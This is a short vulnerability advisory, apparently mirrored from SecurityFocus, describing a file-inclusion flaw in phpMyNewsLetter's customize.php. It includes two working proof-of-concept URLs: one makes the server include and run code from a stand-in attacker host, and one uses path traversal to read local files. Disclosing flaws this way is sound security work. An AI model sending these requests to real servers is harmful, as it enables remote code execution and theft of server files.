16 lines
No EOL
632 B
Text
16 lines
No EOL
632 B
Text
source: https://www.securityfocus.com/bid/5886/info
|
|
|
|
A vulnerability has been discovered in phpMyNewsLetter.
|
|
|
|
Reportedly, it is possible to pass an attacker-specified file include location to a CGI paramter of the 'customize.php' script.
|
|
|
|
This may allow an attacker to execute arbitrary commands with the privileges of the webserver.
|
|
|
|
Additionally, an attacker may exploit this problem to view local webserver readable files.
|
|
|
|
http://[target]/include/customize.php?l=http://[attacker]/code.txt&text=Hello%20World
|
|
With in http://[attacker]/code.txt :
|
|
<? echo $text; ?>
|
|
|
|
or
|
|
http://[target]/include/customize.php?l=../path/file/to/view |